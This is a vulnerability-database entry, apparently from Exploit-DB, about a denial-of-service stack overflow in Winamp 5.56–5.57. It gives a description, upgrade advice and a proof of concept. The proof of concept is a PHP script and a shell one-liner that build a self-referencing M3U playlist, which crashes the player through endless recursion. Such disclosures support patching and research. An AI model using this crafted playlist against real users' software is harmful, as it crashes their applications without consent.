header-logo
Suggest Exploit
vendor:
Winamp
by:
scriptjunkie, scriptjunkie.1 {nospam} googlemail {nospam} com
7.5
CVSS
HIGH
Stack Overflow
119
CWE
Product Name: Winamp
Affected Version From: 5.56
Affected Version To: 5.57
Patch Exists: YES
Related CWE: none at time of writing
CPE: a:nullsoft:winamp
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP, Windows 7
2009

Winamp <= 5.57 Stack Overflow

A stack overflow vulnerability exists in Winamp versions 5.57 and 5.56. An attacker can exploit this vulnerability by sending a specially crafted audio/x-mpegurl header to the vulnerable application. This will cause a stack overflow, resulting in a denial of service.

Mitigation:

Upgrade to the latest version of Winamp to mitigate this vulnerability.
Source

Exploit-DB raw data:

# Exploit Title: Winamp <= 5.57 Stack Overflow
# Date: 22 Dec 2009
# Author: scriptjunkie, scriptjunkie.1 {nospam} googlemail {nospam} com
# Software Link: http://www.winamp.com/media-player
# Version: 5.57, 5.56
# Tested on: Windows XP, Windows 7
# CVE: none at time of writing
# Code: 

PHP:

<?php 
header("Content-type: audio/x-mpegurl");
echo $_SERVER["SCRIPT_URI"]."/blah.m3u";
?>



Local M3U:
echo "a.m3u" > a.m3u

# OMG WE'RE PWNED: chill, it's not a stack buffer overflow, just a stack overflow. DoS.